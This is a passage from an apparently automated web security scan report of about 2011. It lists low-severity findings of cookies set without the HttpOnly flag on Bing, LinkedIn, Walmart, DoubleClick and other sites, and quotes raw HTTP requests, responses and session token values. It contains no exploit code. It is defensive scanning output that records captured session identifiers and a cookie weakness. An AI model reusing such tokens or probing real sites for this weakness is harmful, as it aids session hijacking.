SRCHD=MS=1621028&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:08:44 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.42. http://www.bing.com/travel/deals/last-minute-flight-deals.do previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/deals/last-minute-flight-deals.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=A48EA884FEF0FFF60977843516BE3B8B; Domain=.bing.com; Path=/travel
ETID=BCID-zqvs48etgfd15yz5mbf6s748nk29_VID-z6fe286i2v7d0jyz7ntuvlu23m497_UID-; Domain=.bing.com; Expires=Tue, 29-Jan-2013 17:09:02 GMT; Path=/travel
_SS=SID=E663063A7EEA44019D8EA6796AF3F79D; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8620ba7d672b4a22bb6826c6ea8bdf69; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1621029&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 17:09:02 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.43. http://www.bing.com/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/destinations/honolulu-hawaii-hotels-hostels-motels-1002751

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=0915020A0415116467B0471DBB4BFCCC; Domain=.bing.com; Path=/travel
ETID=BCID-z1frs5ci265ddmyz5ee43ld448c06_VID-n3drr7hochmdyz5qnmnshetag4o_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:03 GMT; Path=/travel
_HOP=I=1&TS=1296345183; domain=.bing.com; path=/
_SS=SID=1A1CA9064645474DA9C96504F5DBD78E; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.44. http://www.bing.com/travel/hotels previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.bing.com
Path:	/travel/hotels

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=30926D6422C305F2841AF2C231837CCF; Domain=.bing.com; Path=/travel
ETID=BCID-z6d2ojptrcpcsnyz5s94j9eripmvh_VID-2qgb11njgihtayz4ep5daa0tahh5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
_SS=SID=52ECE574E10C48CFB614C0DDE7323FE8; domain=.bing.com; path=/
MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c8f06a5eed62441db9a221eb26be6486f; expires=Mon, 28-Jan-2013 23:53:03 GMT; domain=.bing.com; path=/
OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.45. http://www.dailygrail.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dailygrail.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS2c2d3112bb07aea5c6314767c88e0a7a=7o9nkha47fuqrullf1i58nh6t2; expires=Tue, 22-Feb-2011 06:38:51 GMT; path=/; domain=.dailygrail.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.dailygrail.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.46. http://www.davidpoll.com/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.davidpoll.com
Path:	/2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=782daaca0cd252e2cad9d7049b165cec; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/01/26/quickly-building-a-trial-mode-for-a-windows-phone-application/ HTTP/1.1
Host: www.davidpoll.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.dooce.com
Path:	/\|http:/www.mightygoods.com/\|http:/www.coolmompicks.com\|onemanga.com\|psychcentral.com\|webmail.aol.com\|http:/www.weblogsinc.com\|http:/www.webmd.com/$\|wonderwall.redacted\|msn.com/wonderwall\|v14.msn.com/\|preview.redacted/\|www.redacted/preview.aspx\|mtv.com/videos/\|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS30952fbaf4ac11922b9cafbdf8d115e4=0feb3e2c1484ef81e4f5902f9eda5c12; expires=Tue, 22-Feb-2011 05:25:54 GMT; path=/; domain=.dooce.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.48. http://www.kanoodle.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:25 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.49. http://www.kanoodle.com/ajax/search_spy_data.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.50. http://www.kanoodle.com/ajax/search_spy_data_today.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/ajax/search_spy_data_today.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 14:53:32 GMT
Server: Apache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:32 GMT
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 765

&title=Top+Searches+-+History,{font-size: 16px; color: #003399}&
&x_legend=Term,14,#003399&
&x_label_style=9,#003399,2&
&x_axis_steps=1&
&y_legend=Percent,14,#003399&
&y_ticks=5,10,3&
&bar=100,#
...[SNIP]...

17.51. http://www.kanoodle.com/search_spy.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.kanoodle.com
Path:	/search_spy.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

kanoodle-session-ui=b786fd7d80352a237ab285d39e43c650; domain=.kanoodle.com; path=/; expires=Sun, 13-Feb-2011 14:53:31 GMT

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.52. http://www.linkedin.com/cws/share-count previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/cws/share-count

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID="ajax:8523036383389754514"; Version=1; Path=/
leo_auth_token="GST:8FX-AizfuLs_YwcHoZSvLUTR1AIZyDsYg1FmX3RAtkskBYeHYyd-1Z:1296398887:819be2dfbd9e083133f7ab8f52acc0fa6efb40e0"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:18:06 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cws/share-count?url=http%3A%2F%2Finformationarbitrage.com%2Fpost%2F3007820135%2Fstart-fund-no-big-deal-business-as-usual HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&d94e49db-3c23-4a26-a29f-2bc2d85c808d"; visit=G

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:8523036383389754514"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8FX-AizfuLs_YwcHoZSvLUTR1AIZyDsYg1FmX3RAtkskBYeHYyd-1Z:1296398887:819be2dfbd9e083133f7ab8f52acc0fa6efb40e0"; Version=1; Max-Age=1799; Expires=Sun, 30-Jan-2011 15:18:06 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/javascript;charset=UTF-8
Content-Language: en-US
Date: Sun, 30 Jan 2011 14:48:07 GMT
Content-Length: 137

IN.Tags.Share.handleCount({"count":33,"url":"http://informationarbitrage.com/post/3007820135/start-fund-no-big-deal-business-as-usual"});

17.53. http://www.msdn.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.msdn.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQCAARBS=HDGLAPLCFCHLAHILNAHKNFDH; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.msdn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 30 Jan 2011 15:48:49 GMT
Server: Microsoft-IIS/6.0
P3P: CP='ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI'
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
Location: http://msdn.microsoft.com
Content-Length: 23
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQCAARBS=HDGLAPLCFCHLAHILNAHKNFDH; path=/
Cache-control: private

17.54. https://www.msnfeedback.com/perseus/se.ashx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.msnfeedback.com
Path:	/perseus/se.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASP.NET_SessionId=so3zhbfsyas5riuwao00fhn1; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /perseus/se.ashx HTTP/1.1
Host: www.msnfeedback.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.55. http://www.opensource.org/licenses/gpl-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/gpl-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=5tn15kgku9ganumk32p2galds1; expires=Tue, 22-Feb-2011 05:34:18 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.56. http://www.opensource.org/licenses/mit-license.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.opensource.org
Path:	/licenses/mit-license.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=6th723c18tdksfb5ri6bpq7kv1; expires=Tue, 22-Feb-2011 02:57:15 GMT; path=/; domain=.opensource.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.57. http://www.popsci.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.popsci.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS98684d1eb89eae890ac2d30814f7062d=3na39ksk8u091m5b71vntg50k3; expires=Tue, 22-Feb-2011 06:51:42 GMT; path=/; domain=.popsci.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popsci.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.58. http://www.sciencenews.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.sciencenews.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=6bcr7p0ka1rpr4bsk02joad525; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.sciencenews.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:18:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=6bcr7p0ka1rpr4bsk02joad525; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head id="head">



<meta http-equiv="Content-Type"
...[SNIP]...

17.59. http://www.scientificamerican.com/blog/observations/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/blog/observations/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=155211547;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
CFTOKEN=84610132;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/
CFID=155211547;path=/
CFTOKEN=84610132;path=/
CFGLOBALS=urltoken%3DCFID%23%3D155211547%26CFTOKEN%23%3D84610132%23lastvisit%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A00%27%7D%23hitcount%3D2%23cftoken%3D84610132%23cfid%3D155211547%23;expires=Tue, 22-Jan-2041 03:19:00 GMT;path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/observations/ HTTP/1.1
Host: www.scientificamerican.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.60. http://www.scientificamerican.com/errors/404.cfm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.scientificamerican.com
Path:	/errors/404.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=155211566;path=/
CFTOKEN=70876219;path=/
CFGLOBALS=urltoken%3DCFID%23%3D155211566%26CFTOKEN%23%3D70876219%23lastvisit%3D%7Bts%20%272011%2D01%2D30%2012%3A14%3A49%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D29%2022%3A19%3A05%27%7D%23hitcount%3D3%23cftoken%3D70876219%23cfid%3D155211566%23;expires=Tue, 22-Jan-2041 17:14:49 GMT;path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.61. http://www.tigerdirect.com/applications/SearchTools/item-details.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.tigerdirect.com
Path:	/applications/SearchTools/item-details.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SessionId=2683290720110129202406173193214243; expires=Sun, 29-Jan-2012 05:00:00 GMT; path=/
pop%5Fcheck=active; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/
visited=tempyes; expires=Sun, 30-Jan-2011 05:00:00 GMT; path=/
DB=msImageSC=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F620x150B%2Ejpg&Surveyflag=1&msImageID=%2Fmicrosoft%2FMSelasticity%2Dbnr%5F430x150B%2Ejpg&ItemDetailsBeta=Y&msProduct=1782290&msRandX=44; path=/
SRVR=WEBX10%2D08A; path=/
Cart=Landing=http%3A%2F%2Fwww%2Etigerdirect%2Ecom%2Fapplications%2FSearchTools%2Fitem%2Ddetails%2Easp&Referer=; path=/
SRCCODE=WEB1101; expires=Mon, 28-Feb-2011 05:00:00 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /applications/SearchTools/item-details.asp HTTP/1.1
Host: www.tigerdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.62. http://www.unica.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.unica.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=6CBE4A3A1D183B08A17C13A27DDBEAE2.ds1; Path=/
RedDotLiveServerSessionID_unica_corporate_2009=SID-51125F36-8F1B4ED4; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.unica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.63. http://www.walmart.com/|http:/www.walmart.com/cp/toys/4171|http:/www.walmart.com/cp/Electronics/3944 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.walmart.com
Path:	/\|http:/www.walmart.com/cp/toys/4171\|http:/www.walmart.com/cp/Electronics/3944

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WMSessionID=00000005d1b5c98a3fee429a173ace0a3fdb68dfdf66d4a6_1296353034111_SSL207_10-15-140-49_1296353034111_11.1_N_; Domain=.walmart.com; Path=/
com.wm.visitor=12965524989; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
spcf.backup="|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
com.wm.anoncart=129655249891685177; Domain=.walmart.com; Expires=Wed, 27-Jan-2021 02:03:54 GMT; Path=/
spcf.backup="|com.wm.anoncart:129655249891685177|:|com.wm.visitor:12965524989|"; Version=1; Domain=.walmart.com; Path=/
cef.env=PROD+B++H++D++Y+%3Fcat%3D3891+C+; Domain=.walmart.com; Path=/
com.wm.reflector="reflectorid:0000000000000000000000@lastupd:1296353034113@firstcreate:1296353034113"; Version=1; Domain=.walmart.com; Path=/
NSC_xxx.xbmnbsu.dpn-mc=ffffffff0907962045525d5f4f58455e445a4a423660;path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.64. http://www.zacks.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.zacks.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PHPSESSID=6ssok6pvga1gucejl91shelqj6; path=/
user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
user_session=b82d9dee43fc1bc1fc47285cc593fd37; expires=Sun, 06-Feb-2011 02:04:12 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
CUSTOMER_ID=deleted; expires=Sat, 30-Jan-2010 02:04:11 GMT; path=/; domain=.zacks.com
cf60519feb1344e434b8444b746a915b=cdaeeeba9b4a4c5ebf042c0215a7bb0e; expires=Mon, 31-Jan-2011 02:04:12 GMT; path=/; domain=.zacks.com

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.zacks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

17.65. http://ad.doubleclick.net/ad/N3973.MSN/B4412732.227 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N3973.MSN/B4412732.227

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 23:41:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

17.66. http://ad.doubleclick.net/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N2998.7981.MICROSOFTONLINEL.P./B5115763.6

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c883d90320000a3||t=1296407519|et=730|cs=2n6_cukr; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 17:11:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 17:11:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.67. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c85508a32000084|685973/957280/15004|t=1296353092|et=730|cs=l6z5ub1z; path=/; domain=.doubleclick.net; expires=Tue, 29 Jan 2013 02:04:52 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sat, 29 Jan 2011 02:04:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.68. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c8a488932000097|737194/848412/15003|t=1296344711|et=730|cs=pupuuvqs; path=/; domain=.doubleclick.net; expires=Mon, 28 Jan 2013 23:45:11 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 28 Jan 2011 23:45:11 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

17.69. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:04 GMT; path=/
c_1=33:353:23:3:0:38345:1296353104:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.23.js.120x30/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:04 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:04 GMT; path=/
Set-Cookie: c_1=33:353:23:3:0:38345:1296353104:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:04 GMT; path=/
Location: http://www.scottrade.com/lp/pc1/?cid=AM|33|353|23|3&rid=L|0&amvid=4d2cdd9abba1d
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

17.70. http://ad.wsod.com/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:10 GMT; path=/
c_1=33:353:516:3:0:38345:1296353110:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:10 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /click/8bec9b10877d5d7fd7c0fb6e6a631357/353.516.js.120x30/** HTTP/1.1
Host: ad.wsod.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: u=4d2cdd9abba1d; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; i_1=33:353:23:3:0:38345:1296350848:L|46:572:479:0:0:37754:1295635392:L|33:971:560:0:0:33209:1295378828:B2; c_1=33:967:555:0:0:36941:1294800536:L; o=1:1;

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Sun, 30 Jan 2011 02:05:10 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Wed, 02-Mar-2011 02:05:10 GMT; path=/
Set-Cookie: c_1=33:353:516:3:0:38345:1296353110:L|33:967:555:0:0:36941:1294800536:L; expires=Tue, 01-Mar-2011 02:05:10 GMT; path=/
Location: http://www.scottrade.com/lp/7e/?cid=AM|33|353|516|3&rid=L|0&amvid=4d2cdd9abba1d
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

17.71. http://ad.wsod.com/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/457d7d7cd3cd82d66ba00fc48f756260/45.0.js.300x250/1296350884**

Issue detail

